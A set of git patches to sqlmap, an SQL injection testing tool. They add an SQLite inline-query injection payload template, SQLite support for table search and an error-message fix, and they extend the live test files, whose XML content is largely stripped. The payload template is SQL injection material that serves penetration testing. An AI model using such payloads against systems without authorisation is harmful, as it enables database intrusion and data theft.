From 48e0154fc3dd6645e8a48fa7497b6ca733b34499 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Mon, 14 Jan 2013 15:30:01 +0000 Subject: [PATCH 1/5] added SQLite inline queries payload --- xml/payloads.xml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/xml/payloads.xml b/xml/payloads.xml index 6e9155ff2..d9cb48b22 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -1977,6 +1977,25 @@ Formats: Oracle + + + SQLite inline queries + 6 + 1 + 1 + 1,2,3,8 + 3 + SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' + + SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))||'[DELIMITER_STOP]' + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ SQLite +
+ From e555c2be30e538f028ec5fccebf064872b5e8c56 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Mon, 14 Jan 2013 16:26:11 +0000 Subject: [PATCH 2/5] added support for --search -T for SQLite --- plugins/generic/search.py | 85 +++++++++++++++++++++++---------------- xml/queries.xml | 5 ++- 2 files changed, 54 insertions(+), 36 deletions(-) diff --git a/plugins/generic/search.py b/plugins/generic/search.py index 4edbfa8c6..a79ff9093 100644 --- a/plugins/generic/search.py +++ b/plugins/generic/search.py @@ -193,6 +193,16 @@ class Search: query += whereDbsQuery values = inject.getValue(query, blind=False, time=False) + if Backend.isDbms(DBMS.SQLITE): + newValues = [] + + if isinstance(values, basestring): + values = [values] + for value in values: + newValues.append(["SQLite_masterdb", value]) + + values = newValues + for foundDb, foundTbl in filterPairValues(values): foundDb = safeSQLIdentificatorNaming(foundDb) foundTbl = safeSQLIdentificatorNaming(foundTbl, True) @@ -205,47 +215,50 @@ class Search: else: foundTbls[foundDb] = [foundTbl] else: - infoMsg = "fetching number of databases with table" - if tblConsider == "1": - infoMsg += "s like" - infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) - logger.info(infoMsg) - - query = rootQuery.blind.count - query += tblQuery - query += whereDbsQuery - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - warnMsg = "no databases have table" + if not Backend.isDbms(DBMS.SQLITE): + infoMsg = "fetching number of databases with table" if tblConsider == "1": - warnMsg += "s like" - warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) - logger.warn(warnMsg) + infoMsg += "s like" + infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) + logger.info(infoMsg) - continue - - indexRange = getLimitRange(count) - - for index in indexRange: - query = rootQuery.blind.query + query = rootQuery.blind.count query += tblQuery query += whereDbsQuery - if Backend.isDbms(DBMS.DB2): - query += ") AS foobar" - query = agent.limitQuery(index, query) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - foundDb = unArrayizeValue(inject.getValue(query, union=False, error=False)) - foundDb = safeSQLIdentificatorNaming(foundDb) + if not isNumPosStrValue(count): + warnMsg = "no databases have table" + if tblConsider == "1": + warnMsg += "s like" + warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) + logger.warn(warnMsg) - if foundDb not in foundTbls: - foundTbls[foundDb] = [] + continue + + indexRange = getLimitRange(count) + + for index in indexRange: + query = rootQuery.blind.query + query += tblQuery + query += whereDbsQuery + if Backend.isDbms(DBMS.DB2): + query += ") AS foobar" + query = agent.limitQuery(index, query) + + foundDb = unArrayizeValue(inject.getValue(query, union=False, error=False)) + foundDb = safeSQLIdentificatorNaming(foundDb) + + if foundDb not in foundTbls: + foundTbls[foundDb] = [] + + if tblConsider == "2": + foundTbls[foundDb].append(tbl) if tblConsider == "2": - foundTbls[foundDb].append(tbl) - - if tblConsider == "2": - continue + continue + else: + foundTbls["SQLite_masterdb"] = [] for db in foundTbls.keys(): db = safeSQLIdentificatorNaming(db) @@ -257,7 +270,8 @@ class Search: logger.info(infoMsg) query = rootQuery.blind.count2 - query = query % unsafeSQLIdentificatorNaming(db) + if not Backend.isDbms(DBMS.SQLITE): + query = query % unsafeSQLIdentificatorNaming(db) query += " AND %s" % tblQuery count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) @@ -275,7 +289,8 @@ class Search: for index in indexRange: query = rootQuery.blind.query2 - query = query % unsafeSQLIdentificatorNaming(db) + if not Backend.isDbms(DBMS.SQLITE): + query = query % unsafeSQLIdentificatorNaming(db) query += " AND %s" % tblQuery query = agent.limitQuery(index, query) diff --git a/xml/queries.xml b/xml/queries.xml index d7db742c0..3a186642e 100644 --- a/xml/queries.xml +++ b/xml/queries.xml @@ -347,7 +347,10 @@ - + + + + From 413b5e7ab45a9bdc92b0b8212cf1fd4627c349db Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Mon, 14 Jan 2013 16:49:05 +0000 Subject: [PATCH 3/5] fixed error message --- plugins/dbms/sqlite/enumeration.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/plugins/dbms/sqlite/enumeration.py b/plugins/dbms/sqlite/enumeration.py index 9a43db908..40a0f0ef2 100644 --- a/plugins/dbms/sqlite/enumeration.py +++ b/plugins/dbms/sqlite/enumeration.py @@ -56,7 +56,7 @@ class Enumeration(GenericEnumeration): return [] def searchColumn(self): - errMsg = "on SQLite you must specify the table and columns to dump" + errMsg = "on SQLite it is not possible to search columns" raise SqlmapUnsupportedFeatureException(errMsg) def getHostname(self): From 8a2b994b9418e64f1196e30bc7e7fa2f4556b3dd Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Mon, 14 Jan 2013 16:50:24 +0000 Subject: [PATCH 4/5] added SQLite test cases (issue #312) --- xml/livetests.xml | 284 ++++++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 272 insertions(+), 12 deletions(-) diff --git a/xml/livetests.xml b/xml/livetests.xml index 84fafe529..548bacf65 100644 --- a/xml/livetests.xml +++ b/xml/livetests.xml @@ -10,6 +10,7 @@ + @@ -473,6 +474,150 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + @@ -578,6 +723,39 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + @@ -1172,6 +1350,43 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + @@ -1183,7 +1398,7 @@ - + @@ -1194,7 +1409,7 @@ - + @@ -1205,7 +1420,7 @@ - + @@ -1216,7 +1431,7 @@ - + @@ -1227,7 +1442,7 @@ - + @@ -1239,7 +1454,7 @@ - + @@ -1250,7 +1465,7 @@ - + @@ -1261,7 +1476,7 @@ - + @@ -1272,7 +1487,7 @@ - + @@ -1283,7 +1498,7 @@ - + @@ -1294,7 +1509,7 @@ - + @@ -1306,7 +1521,52 @@ - + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + From 3fa720e699f5f270516b0ce2b7ae0ac1c4e0f957 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Mon, 14 Jan 2013 17:30:42 +0000 Subject: [PATCH 5/5] added first Oracle test cases --- xml/livetests.xml | 243 +++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 238 insertions(+), 5 deletions(-) diff --git a/xml/livetests.xml b/xml/livetests.xml index 548bacf65..21015e621 100644 --- a/xml/livetests.xml +++ b/xml/livetests.xml @@ -49,7 +49,7 @@ - + @@ -93,7 +93,7 @@ - + @@ -137,7 +137,7 @@ - + @@ -181,7 +181,7 @@ - + @@ -239,7 +239,7 @@ - + @@ -474,6 +474,239 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +